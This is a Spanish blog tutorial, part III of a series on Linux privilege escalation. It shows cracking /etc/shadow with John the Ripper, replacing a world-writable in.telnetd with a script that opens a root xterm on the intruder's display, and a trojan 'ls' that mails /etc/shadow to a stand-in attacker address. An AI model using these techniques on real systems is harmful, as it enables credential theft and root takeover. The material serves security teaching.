Blog

ELEVACION DE PRIVILEGIOS EN LINUX PARTE III

Si recordamos tanto la primera parte de esta serie como la segunda, ya tenemos las herramientas necesarias para elevar privilegios.. o por lo menos para empezar a entrar en materia.

Lo que vamos a ver ahora son “ideas” de por donde podeis ir más exactamente de la misma manera que en la II parte os puse la explotación de “ptrace” por ejemplo.

Lo que nos debe de quedar muy claro es que siempre debemos buscar “cosas” como ficheros con permisos y que permisos , pertenencia a grupos, usuarios y todo lo que vosotros penseis que puede ser “curioso”.

 Por ejemplo, además de buscar ficheros en propiedad de un cierto grupo, también se puede intentar localizar todos aquellos ficheros del sistema que cualquier usuario pudiera leer no?..

Como buscar ficheros que sean legibles por cualquier usuario del sistema dentro del directorio /etc ? ( Aunque lo tienes en la parte II 😉

$ find /etc -type f -perm -4 -print 2> /dev/null

En el directorio /etc hay muchos ficheros que no deberían ser leídos por cualquier usuario. Por ejemplo, el fichero /etc/shadow ( y /etc/passwd ) contiene las contraseñas cifradas de los usuarios. Cualquiera que tuviera acceso a este fichero podría lanzar un ataque mediante fuerza bruta contra el utilizando John the Ripper..ASÍ 

Debian / Ubuntu Linux:

 

$ sudo apt-get install john

$ sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db 

 
RHEL / CentOS / Fedora Linux

 

# rpm -ivh john* 

# /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db 

 

$ john /tmp/crack.password.db

 

( Salida)

 john /tmp/crack.password.db

Loaded 1 password (FreeBSD MD5 [32/32])

$ john -show /tmp/crack.password.db

secnight:123456:1002:1002:secnight,,,:/home/secnight:/bin/bash

juan:abc123:1003:1003::/home/juan:/usr/bin/rssh

2 passwords cracked, 1 left

Por lo tanto un intruso podría intentar localizar ficheros con permisos de escritura utilizando el siguiente comando

$ find / -type f -perm -2 -print 2> /dev/null

 /usr/sbin/in.telnetd

En este ejemplo y continuando con el mismo usuario “juan” de las serie, aquí el amigo tiene permisos de escritura sobre el fichero in.telnetd.

El servicio inetd o xinetd del sistema víctima invoca al fichero in.telnetd cada vez que llega una conexión entrante al puerto telnet.

El intruso podría editar el fichero” in.telnetd “ y escribir, por ejemplo, lo siguiente

 #!/bin/bash

 xterm -display direccion_ip_intruso:0.0 &

Tras esto, el intruso tendrá que ejecutar en su sistema esto

 xhost +direccion_ip_victima

De esta forma le concede permisos a la máquina víctima para que abra un programa X en el servidor X del intruso.

Y ahora, todo lo que tendrá que hacer el “hacker” será lanzar un “telnet” contra el sistema de la victima ( es decir, el “picueto” ).

 Esto hará que “inetd” o “xinetd” invoquen al programa /usr/sbin/in.telnetd con privilegios de root y un “potito” terminal de ROOT aparecerá en la pantalla del intruso haciendo las delicias del hacker con una post explotación de lujo y a “manopla”.;)

QUE PASA CON “.”

Siempre que un usuario ejecuta un comando, la shell busca la ubicación de este comando en la lista de directorios contenida en la variable del entorno PATH:

 

$ echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/bin:/home/secnight/bin:/bin

Vamos a suponer que el usuario “root” tiene el directorio actual (“.”) incluido en la variable PATH

.:/usr/local/sbin:/usr/local/bin:/usr/bin:/usr/bin:/bin

En caso de que esto sea así, cada vez que el usuario “root” ejecute un comando como “ls”, la shell buscará primero este comando en el directorio actual y luego continuará su búsqueda en el resto de directorios incluidos en la variable PATH.

Pues un TROYANO by the “PATH” no? Explotando “.”

Un usuaro malintencionado de webos con acceso a una cuenta de usuario, como “juan”(alias ‘picueto’), podría crear un fichero llamado “ls” y colocarlo en el directorio personal del picueto ( /home/juan ) y que contenga por ejemplo esto

 

#!/bin/bash

cat /etc/shadow | mail hacker@hacker_mail.com

/bin/ls

Si el usuario “root” se encontrara en el directorio de “juan” y quisiera ver el contenido de este directorio utlizando el comando “ls”, se ejecutaría el anterior script con los permisos de root.

Al hacer esto, el fichero /etc/shadow se enviaría por correo al sistema del “hacker”, y como el script “ls” llama al final al programa real /bin/ls, el usuario “root” no detectaría la diferencia .

Asi que no incluyas nunca en el directorio actual (“.”) en tu variable PATH ..( pues tela :P)

Espero que con esta II parte empeceis a ver la luz de como funciona “el asunto”…

Los ataques deben adptarse al entorno a atacar y vuestra imaginacion muchas veces será la que determine el éxito final en una post explotacion..

Continuará ( Pero metasploit despues de aprender esto .. y lo repetire y repetire … 😉 !! )

Un saludo

 Juan Carlos García

 Live Free Or Die Hacking

  1. R0dW3
    R0dW310-07-2013

    Muy bueno Juan Carlos!
    Gracias

Leave a Reply

*

    No Twitter Messages